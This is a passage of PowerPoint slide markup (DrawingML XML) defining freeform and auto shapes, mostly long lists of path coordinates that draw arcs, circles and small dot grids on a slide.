                  <a:pt x="757665" y="695418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="792075" y="666414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="828169" y="639463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="865858" y="614653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="905052" y="592075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="945663" y="571818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="987601" y="553972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1030778" y="538625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075104" y="525868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1120491" y="515790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1166850" y="508481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1214091" y="504029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1262126" y="502526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1352550" y="502526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1352550" y="3300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310532" y="914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1262126" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1352550" h="1495425">
                <a:moveTo>
                  <a:pt x="1352550" y="502526"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1262126" y="502526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310146" y="504029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1352550" y="508026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1352550" y="502526"/>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9" name="AutoShape 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11420475" y="49339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0" name="Freeform 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11915775" y="4933950"/>
            <a:ext cx="57150" cy="66675"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="57150" h="66675">
                <a:moveTo>
                  <a:pt x="28575" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17466" y="2627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="9779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2250" y="20359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="33274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2250" y="46261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="56880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17466" y="64045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28575" y="66675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39683" y="64045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48768" y="56880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54899" y="46261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57150" y="33274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54899" y="20359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48768" y="9779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39683"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1" name="AutoShape 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11582400" y="49339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2" name="AutoShape 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11744325" y="49339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3" name="Freeform 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11420475" y="5181600"/>
            <a:ext cx="66675" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="66675" h="57150">
                <a:moveTo>
                  <a:pt x="33400" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20413" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9794" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2629" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2629" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9794" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20413" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33400" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46315" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56896" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64047" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66675" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64047" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56896" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46315" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3340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4" name="Freeform 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11915775" y="5181600"/>
            <a:ext cx="57150" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="57150" h="57150">
                <a:moveTo>
                  <a:pt x="28575" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17466" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2250" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2250" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17466" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28575" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39683" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48768" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54899" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57150" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54899" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48768" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39683" y="2250"/>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5" name="Freeform 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11582400" y="5181600"/>
            <a:ext cx="66675" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="66675" h="57150">
                <a:moveTo>
                  <a:pt x="33400" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20413" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9794" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2629" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2629" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9794" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20413" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33400" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46315" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56896" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64047" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66675" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64047" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56896" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46315" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3340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6" name="Freeform 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11744325" y="5181600"/>
            <a:ext cx="66675" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="66675" h="57150">
                <a:moveTo>
                  <a:pt x="33400" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20413" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9794" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2629" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2629" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9794" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20413" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33400" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46315" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56896" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64047" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66675" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64047" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56896" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46315" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3340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7" name="AutoShape 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11420475" y="5419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8" name="Freeform 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11915775" y="5419725"/>
            <a:ext cx="57150" cy="66675"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="57150" h="66675">
                <a:moveTo>
                  <a:pt x="28575" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17466" y="2629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="9794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2250" y="20413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="33400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2250" y="46315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="56896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17466" y="64047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28575" y="66675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39683" y="64047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48768" y="56896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54899" y="46315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57150" y="33400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54899" y="20413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48768" y="9794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39683" y="262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9" name="AutoShape 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11582400" y="5419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0" name="AutoShape 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11744325" y="5419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1" name="AutoShape 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11420475" y="566737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2" name="Freeform 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11915775" y="5667375"/>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3" name="AutoShape 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11582400" y="566737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4" name="AutoShape 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11744325" y="566737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5" name="AutoShape 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11420475" y="587692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6" name="Freeform 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11915775" y="5876925"/>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7" name="AutoShape 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11582400" y="587692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8" name="AutoShape 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11744325" y="587692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9" name="AutoShape 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11420475" y="61150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0" name="Freeform 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11915775" y="6115050"/>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1" name="AutoShape 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11582400" y="61150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2" name="AutoShape 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11744325" y="61150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3" name="AutoShape 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11420475" y="636270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4" name="Freeform 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11915775" y="6362700"/>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5" name="AutoShape 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11582400" y="636270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6" name="AutoShape 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11744325" y="636270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7" name="AutoShape 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11420475" y="66103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8" name="Freeform 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11915775" y="6610350"/>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9" name="AutoShape 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11582400" y="66103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0" name="AutoShape 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11744325" y="66103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1" name="Freeform 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11325225" y="1866900"/>
            <a:ext cx="866775" cy="1733550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="866775" h="1733550">
                <a:moveTo>
                  <a:pt x="866775" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="819221" y="1282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="772337" y="5086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="726190" y="11345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="680844" y="19993"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="636367" y="30965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="592823" y="44192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550281" y="59611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508804" y="77154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="468461" y="96756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="429316" y="118349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391436" y="141869"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="354887" y="167249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="319736" y="194423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286047" y="223325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253888" y="253888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223325" y="286047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194423" y="319736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167249" y="354887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141869" y="391436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118349" y="429316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96756" y="468461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77154" y="508804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59611" y="550281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44192" y="592823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30965" y="636367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19993" y="680844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11345" y="726190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5086" y="772337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="819221"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="866775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="914328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5086" y="961212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11345" y="1007359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19993" y="1052705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30965" y="1097182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44192" y="1140726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59611" y="1183268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77154" y="1224745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96756" y="1265088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118349" y="1304233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141869" y="1342113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167249" y="1378662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194423" y="1413813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223325" y="1447502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253888" y="1479661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286047" y="1510224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="319736" y="1539126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="354887" y="1566300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391436" y="1591680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="429316" y="1615200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="468461" y="1636793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508804" y="1656395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550281" y="1673938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="592823" y="1689357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="636367" y="1702584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="680844" y="1713556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="726190" y="1722204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="772337" y="1728463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="819221" y="1732267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866775" y="1733550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866775"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82" name="Freeform 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11015726" y="471927"/>
            <a:ext cx="1176655" cy="1195070"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1176654" h="1195070">
                <a:moveTo>
                  <a:pt x="0" y="1194947"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="949" y="1146873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3772" y="1099280"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8435" y="1052205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14900" y="1005683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23133" y="959750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33098" y="914442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44758" y="869794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58079" y="825841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73024" y="782621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89558" y="740168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107645" y="698518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127250" y="657707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148336" y="617771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170868" y="578745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194811" y="540665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220128" y="503567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246784" y="467486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274743" y="432458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="303969" y="398519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334427" y="365705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366081" y="334051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398895" y="303593"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432834" y="274366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467862" y="246408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503943" y="219752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541041" y="194435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="579121" y="170492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618147" y="147960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="658083" y="126874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698894" y="107269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740544" y="89182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="782997" y="72648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="826218" y="57703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="870170" y="44382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914818" y="32722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="960126" y="22757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1006059" y="14524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1052581" y="8059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1099656" y="3396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1147249" y="573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1176274"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83" name="Freeform 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11015726" y="1666875"/>
            <a:ext cx="1176655" cy="1195070"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1176654" h="1195070">
                <a:moveTo>
                  <a:pt x="1176274" y="1195074"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1099656" y="1191677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1052581" y="1187013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1006059" y="1180546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="960126" y="1172312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914818" y="1162345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="870170" y="1150682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="826218" y="1137358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="782997" y="1122410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740544" y="1105873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698894" y="1087782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="658083" y="1068174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618147" y="1047084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="579121" y="1024547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541041" y="1000601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503943" y="975279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467862" y="948619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432834" y="920655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398895" y="891425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366081" y="860962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334427" y="829303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="303969" y="796484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274743" y="762541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246784" y="727508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220128" y="691423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194811" y="654320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170868" y="616236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148336" y="577206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127250" y="537266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107645" y="496451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89558" y="454798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73024" y="412342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58079" y="369118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44758" y="325163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33098" y="280513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23133" y="235202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14900" y="189267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8435" y="142744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3772" y="95667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="949" y="4807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84" name="Freeform 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11063605" y="728980"/>
            <a:ext cx="389255" cy="439420"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
